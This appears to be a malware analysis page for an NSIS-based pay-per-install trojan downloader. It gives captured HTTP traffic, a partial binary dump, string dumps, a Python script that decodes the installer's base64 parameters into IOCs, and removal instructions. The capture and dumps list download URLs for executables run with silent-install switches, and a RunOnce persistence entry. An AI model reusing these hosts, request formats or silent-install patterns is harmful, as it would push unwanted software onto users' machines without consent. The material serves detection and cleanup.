Set-Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 13:55:57 GMT
GIF89a.............!.......,...........D..;..


GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
................. ...............................................t....
.......C..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...C.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......



GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
40f
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0
hXXp://software-repository.com/Generic/zgm.php?sid=8100001
/install
hXXp://down.eszju.cn/8001/ttwifi.exe
{5DB9279D5A0CB29AA3ED55D055708882}
hXXps://vnl1.izabelcoin.com/vnl1.exe
/PID=1670 /S
hXXp://d2xvc2nqkduarq.cloudfront.net/main/clc_jq.exe
/c=clc /i=106 /s
hXXp://livestatscounter.com/SysInfo/validator/timer.php
hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2
hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe
/verysilent
hXXp://down.hejie123.com/global/yeaplayer.exe
hXXp://VVV.liuzhoua.com/shanghaiuc3.exe
hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe

0

<<< skipped >>>
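Two things in this capture are worth decoding rather than pasting into a report as opaque strings: the prm= value on the dl.php request (it is base64 and wraps the landing-page URL that brought the user here, including a further base64 "dp" record), and the vos_n.php body above, which is the pay-per-install task list the installer works through: one download URL per line, sometimes followed by a line of switches for that download, plus a bapo.labst.ru path whose base64 carries a JSON offer descriptor. The following is an added example, not part of the Lavasoft report: it decodes those values and turns the list into structured IOCs. PRM_B64 is copied from the dl.php request and TASK_LIST from the de-chunked vos_n.php body; the layout rule used by parse_task_list (a non-URL line belongs to the download before it) is inferred from the body and was not confirmed against the installer code, and the reading of the dp record as client IP plus country code is an observation, not a documented format.

```python
"""Added example (not from the Lavasoft report): decode the prm=, dp and
bapo.labst.ru values from this capture and parse the vos_n.php task list."""
import base64
import json
import re

# Copied from the dl.php request in the capture.
PRM_B64 = "dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ=="

# Copied from the vos_n.php response body (chunk framing removed).
LABST_TOKEN = "YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0"
TASK_LIST = "\r\n".join([
    "hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542",
    "hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483",
    "hXXp://bapo.labst.ru/" + LABST_TOKEN,
    "hXXp://software-repository.com/Generic/zgm.php?sid=8100001",
    "/install",
    "hXXp://down.eszju.cn/8001/ttwifi.exe",
    "{5DB9279D5A0CB29AA3ED55D055708882}",
    "hXXps://vnl1.izabelcoin.com/vnl1.exe",
    "/PID=1670 /S",
    "hXXp://d2xvc2nqkduarq.cloudfront.net/main/clc_jq.exe",
    "/c=clc /i=106 /s",
    "hXXp://livestatscounter.com/SysInfo/validator/timer.php",
    "hXXp://livestatscounter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2",
    "hXXp://dl.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe",
    "/verysilent",
    "hXXp://down.hejie123.com/global/yeaplayer.exe",
    "hXXp://VVV.liuzhoua.com/shanghaiuc3.exe",
    "hXXp://cloudfront.7950a1a535832c52ae50f09d3e424734190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe",
])


def refang(s):
    """Undo the report's defanging (hXXp -> http, VVV. -> www.)."""
    return s.replace("hXXp", "http").replace("://VVV.", "://www.")


def b64_lenient(s):
    """base64-decode a value whose '=' padding may have been stripped."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_prm(prm):
    """prm= is base64 of 'url={{<landing URL>}}'; return the inner URL."""
    text = b64_lenient(prm).decode("ascii", "replace")
    if text.startswith("url={{") and text.endswith("}}"):
        text = text[len("url={{"):-2]
    return text


def decode_dp(url):
    """dp= inside the landing URL is two '-_-' separated blobs. The first is
    plain base64 of an underscore-joined record (in this capture it appears to
    carry the client's public IP and country code); the second is left opaque."""
    m = re.search(r"[?&]dp=([^&]*)", url)
    if not m:
        return None
    first = [p for p in m.group(1).split("-_-") if p][0]
    return b64_lenient(first).decode("ascii", "replace")


def decode_labst_token(url):
    """The bapo.labst.ru path is base64 of a 32-character prefix followed by a
    JSON object (sid, companies, silent, ...); return that object as a dict."""
    raw = b64_lenient(url.rsplit("/", 1)[1]).decode("ascii", "replace")
    return json.loads(raw[raw.index("{"):])


def parse_task_list(body):
    """Group the vos_n.php body into (url, switches) pairs: a line starting with
    a scheme opens a new download; a following non-URL line (e.g. '/verysilent'
    or a GUID in braces) is the argument string or tag for that download."""
    tasks = []
    for line in refang(body).splitlines():
        line = line.strip()
        if not line:
            continue
        if re.match(r"https?://", line):
            tasks.append([line, []])
        elif tasks:
            tasks[-1][1].append(line)
    return [(url, " ".join(args)) for url, args in tasks]


if __name__ == "__main__":
    landing = decode_prm(PRM_B64)
    print("landing page:", landing)
    print("dp record   :", decode_dp(landing))
    for url, args in parse_task_list(TASK_LIST):
        if "bapo.labst.ru" in url:
            print(url.split("/")[2], "->", decode_labst_token(url))
        else:
            print(url, args)
```

The decoded list is the useful output for a blocklist: thirteen downloads from eleven distinct hosts, several of them launched silently (/verysilent, /S, /s), which matches the "Downloading %s" strings in the nsoA.tmp dump and the Validate.exe and countup.php fetches seen in the capture. The "silent":"1" field in the labst descriptor and the per-partner "companies" map are what make this a pay-per-install network rather than a single adware product.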

The Trojan connects to the servers at the following location(s):

%original file name%.exe_348:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
netc.dll
0732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Xt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp\inetc.dll
or.dll
.qeRn
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
IpConfig.dll
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
 2"332"6
`%dRH8`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
nsn18.tmp
5c092625893377a53bb4b4.exe
58C5C~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-B792-9F9E-2793-BE0B0302CDFB
jZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
1938133850
m\LOCALS~1\Temp\dloc.off
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dloc.off
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
ttp://data.biphysics.com/r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn18.tmp
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp
10732314-17
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.0

nsoA.tmp_320:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
MSVCRT.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl23.tmp
nsl23.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
Uninstall.exe
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/countup.php?sid=554655542
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsaE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb14.tmp
dlgen.php?r=vu_vo2_
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.1

qnse20.tmp_532:

.text
`.rdata
@.data
.reloc
PPSetup.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
operator
GetProcessWindowStation
GetWindowsDirectoryW
KERNEL32.dll
GetProcessHeap
GetCPInfo
reason=%i&cmd=%s
\StringFileInfo\xx\%s
Field Web Directory
hXXp://mobilitydata5.com/SysInfo/counthu.php?sid=%lld%lld%llu
hXXp://mobilitydata5.com/SysInfo/countup.php?sid=%lld%lld%llu
NSIS_Inetc (Mozilla)
Content-Type: application/x-www-form-urlencoded
ADVAPI32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
%Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp

nsa22.tmp_2036:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%Program Files%
\System.dll
\nsExec.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsa22.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb24.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa22.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsz1D.tmp:584
    nsh16.tmp:1976
    %original file name%.exe:348
    qnse20.tmp:532
    qnse20.tmp:1764
    nsa22.tmp:2036
    nsoA.tmp:320
    Full_Setup.exe:1240

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nse1F.tmp\WmiInspector.dll (3342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp (2660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\KillProcDLL.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\nsz1D.tmp (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (37949 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1C.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe (1184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[1].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\t1.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (14400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn18.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr17.tmp (43 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\IpConfig.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg15.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (201 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\CAQ1ETAB.htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[2].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1] (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\vos_n[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (15 bytes)
